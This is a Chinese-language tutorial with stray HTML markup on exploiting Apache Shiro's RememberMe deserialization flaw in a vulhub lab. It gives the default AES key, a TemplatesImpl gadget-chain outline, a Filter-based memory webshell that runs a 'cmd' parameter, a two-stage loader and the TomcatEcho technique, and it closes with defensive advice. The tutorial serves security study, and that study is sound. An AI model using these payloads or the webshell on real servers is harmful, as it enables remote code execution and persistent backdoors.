Apache Shiro反序列化漏洞利用与内存马注入技术详解<\/h1>

一、Shiro反序列化漏洞概述<\/h2>

Apache Shiro是一个轻量级Java安全框架，提供认证、授权和会话管理功能。其核心漏洞在于：<\/p>

漏洞原理<\/strong>：Shiro框架在处理HTTP请求的Cookie中的RememberMe值时存在反序列化设计缺陷<\/li>
攻击向量<\/strong>：RememberMe值会被反序列化解析为Java对象，编码方式为：Java对象→原生序列化→AES加密<\/li>

利用条件<\/strong>：攻击者获取服务端使用的AES密钥后，可伪造任意序列化数据，触发远程代码执行<\/li> <\/ol>
二、环境搭建<\/h2>
使用vulhub项目提供的docker环境：<\/p>

访问IP的8080端口可见登录页面<\/li>
靶场依赖库：

commons-collections:3.2.1<\/li>
commons-beanutils:1.8.3<\/li> <\/ul> <\/li> <\/ul>
三、任意代码执行流程<\/h2>
1. 恶意代码准备<\/h3>
创建恶意Java类示例（在\/tmp目录下创建文件）：<\/p>
\/\/ touch.java <\/span><\/span><\/span><\/span>public<\/span> class<\/span> touch<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> java.<\/span>nio<\/span>.<\/span>file<\/span>.<\/span>Files<\/span>.<\/span>write<\/span>(<\/span> <\/span><\/span> java.<\/span>nio<\/span>.<\/span>file<\/span>.<\/span>Paths<\/span>.<\/span>get<\/span>(<\/span>"\/tmp\/touch"<\/span>),<\/span> <\/span><\/span> ""<\/span>.<\/span>getBytes<\/span>()<\/span> <\/span><\/span> );<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 利用TemplatesImpl链加载字节码<\/h3> TemplatesImpl是Java XSLT处理核心类，其_bytecodes<\/code>字段可直接加载字节码。通过构造反序列化链触发getTransletInstance()<\/code>方法，可动态加载并执行恶意类（需继承AbstractTranslet<\/code>）。<\/p> 关键点：<\/p> 使用InstantiateTransformer<\/code>实例化TrAXFilter<\/code>来触发目标方法<\/li> Shiro默认AES密钥：kPH+bIxk5D2deZiIxcaaaA==<\/code>（需根据实际情况替换）<\/li> <\/ul> 3. 生成Payload<\/h3> 使用以下代码生成序列化Payload：<\/p> \/\/ 获取类字节码的方法（示例） <\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> code =<\/span> getCtClass(<\/span>"touch"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>四、内存马注入尝试<\/h2> 1. 内存马准备<\/h3> 创建Filter型内存马：<\/p> \/\/ MemShell.java <\/span><\/span><\/span><\/span>public<\/span> class<\/span> MemShell<\/span> implements<\/span> Filter {<\/span> <\/span><\/span> public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest req,<\/span> ServletResponse res,<\/span> FilterChain chain)<\/span> {<\/span> <\/span><\/span> HttpServletRequest request =<\/span> (<\/span>HttpServletRequest)<\/span> req;<\/span> <\/span><\/span> if<\/span> (<\/span>request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> String cmd =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span> <\/span><\/span> Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span> <\/span><\/span> \/\/ ...处理命令执行结果... <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span> <\/span><\/span> }<\/span> <\/span><\/span> chain.<\/span>doFilter<\/span>(<\/span>req,<\/span> res);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 其他必要方法... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 注入类准备<\/h3> 创建注入类将Filter注册到容器：<\/p> \/\/ Inject.java <\/span><\/span><\/span><\/span>public<\/span> class<\/span> Inject<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> \/\/ 获取MemShell字节码并注册Filter <\/span><\/span><\/span><\/span> String code =<\/span> "MemShell的Base64字节码"<\/span>;<\/span> <\/span><\/span> \/\/ 注册逻辑... <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 问题发现<\/h3> 直接注入失败原因：<\/p> Tomcat对header长度限制（默认8k）<\/li> 完整内存马注入Payload通常超过此限制<\/li> <\/ul> 五、解决方案：分阶段加载<\/h2> 1. ShellLoader设计<\/h3> 改为两阶段加载：<\/p> 第一阶段：Shiro Payload仅包含ShellLoader<\/li> 第二阶段：通过POST data传输内存马字节码<\/li> <\/ol> 关键挑战：在没有request对象的情况下获取请求数据<\/p> 2. TomcatEcho通用回显技术<\/h3> 获取request对象链：<\/p> Thread.currentThread() → ThreadGroup → 遍历线程 → 找到Tomcat工作线程 → 获取RequestInfo → 获取Request\/Response对象 <\/code><\/pre> 3. 优雅的反射工具<\/h3> 实现链式反射获取对象：<\/p> \/\/ 支持多种语法： <\/span><\/span><\/span>\/\/ 1. 获取对象下的变量 <\/span><\/span><\/span><\/span>getField(<\/span>obj,<\/span> "fieldName"<\/span>)<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 类型标注和强制转换 <\/span><\/span><\/span><\/span>getField(<\/span>obj,<\/span> "(Type)fieldName"<\/span>)<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 数组和List下标取值 <\/span><\/span><\/span><\/span>getField(<\/span>obj,<\/span> "arrayField[1]"<\/span>)<\/span> <\/span><\/span> <\/span><\/span>\/\/ 4. 组合实现TomcatEcho链 <\/span><\/span><\/span><\/span>getField(<\/span>Thread.<\/span>currentThread<\/span>(),<\/span> <\/span><\/span> "(java.lang.ThreadGroup)group.threads[10].(org.apache.tomcat.util.threads.TaskThread)target.(org.apache.catalina.connector.Request)request"<\/span>)<\/span> <\/span><\/span><\/code><\/pre>4. 字节码优化<\/h3> 通过Maven编译选项缩小体积：<\/p> <build><\/span> <\/span><\/span> <plugins><\/span> <\/span><\/span> <plugin><\/span> <\/span><\/span> <groupId><\/span>org.apache.maven.plugins<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>maven-compiler-plugin<\/artifactId><\/span> <\/span><\/span> <configuration><\/span> <\/span><\/span> <compilerArgs><\/span> <\/span><\/span> <arg><\/span>-g:none<\/arg><\/span> <\/span> <\/span><\/span> <\/compilerArgs><\/span> <\/span><\/span> <\/configuration><\/span> <\/span><\/span> <\/plugin><\/span> <\/span><\/span> <\/plugins><\/span> <\/span><\/span><\/build><\/span> <\/span><\/span><\/code><\/pre>六、完整攻击流程<\/h2> 生成ShellLoader的Shiro Payload<\/strong><\/p> \/\/ 设置code为ShellLoader类的字节码 <\/span><\/span><\/span><\/span>String code =<\/span> getCtClass(<\/span>"ShellLoader"<\/span>);<\/span> <\/span><\/span>\/\/ 生成RememberMe Cookie <\/span><\/span><\/span><\/code><\/pre><\/li> 准备POST data部分<\/strong><\/p> \/\/ 生成内存马的Base64编码字节码 <\/span><\/span><\/span><\/span>String memShellCode =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>getCtClass(<\/span>"MemShell"<\/span>));<\/span> <\/span><\/span><\/code><\/pre><\/li> 构造最终请求包<\/strong><\/p> RememberMe Cookie：包含ShellLoader的Payload<\/li> POST Data：包含内存马字节码<\/li> 使用URL编码确保传输安全<\/li> <\/ul> <\/li> 发送请求<\/strong><\/p> 成功执行后，内存马将被注入<\/li> 通过cmd<\/code>参数执行任意命令<\/li> <\/ul> <\/li> <\/ol> 七、防御建议<\/h2> 升级Shiro到最新安全版本<\/li> 修改默认AES加密密钥<\/li> 限制反序列化类白名单<\/li> 部署RASP防护方案<\/li> 监控异常RememberMe值请求<\/li> <\/ol> 通过本文所述技术，安全研究人员可以深入理解Shiro反序列化漏洞的利用方式及内存马注入的高级技巧，同时为防御此类攻击提供参考依据。<\/p>